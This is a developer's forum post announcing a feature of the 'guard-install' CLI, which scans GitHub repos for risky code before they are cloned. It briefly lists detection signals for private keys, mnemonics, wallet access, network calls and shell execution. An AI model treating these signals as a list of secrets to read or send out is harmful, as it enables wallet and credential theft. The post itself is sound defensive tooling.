Hey everyone,
I shared this earlier as a CLI to analyse npm packages before installing.
Since then, I’ve added something I think is even more useful:
👉 You can now scan GitHub repos before cloning or running them
npx guard-install --repo https://github.com/user/repo
Why this matters
There’s a growing pattern (especially in crypto interviews / side projects):
“Clone this repo and run it locally”
Some of these repos:
- access environment variables
- interact with wallets / keys
- make outbound network calls
You don’t always notice what’s happening before you run the code.
What the repo scan does
- Scans files (without executing anything)
-
Detects:
- sensitive data patterns (PRIVATE_KEY, MNEMONIC)
- crypto/wallet usage
- network calls
- shell execution
Combines signals → gives a risk level (LOW / MEDIUM / HIGH)
Explains why something might need review
Example
🔐 Sensitive data patterns found
💰 Cryptocurrency functionality
🌐 Network activity detected
Risk: MEDIUM — Sensitive domain with multiple relevant signals
Links
GitHub: https://github.com/dasanakudigenithin/guard-install
npm: https://www.npmjs.com/package/guard-install
DEV.to: https://dev.to/nithindj192/npm-installs-packages-blindly-i-built-a-cli-to-fix-that-1dd
Still early, but getting more practical now.
Would love feedback on:
- Are these signals useful or noisy?
- What would make you trust a HIGH risk warning?
- Would you use this before running unknown repos?
Thanks!
Top comments (0)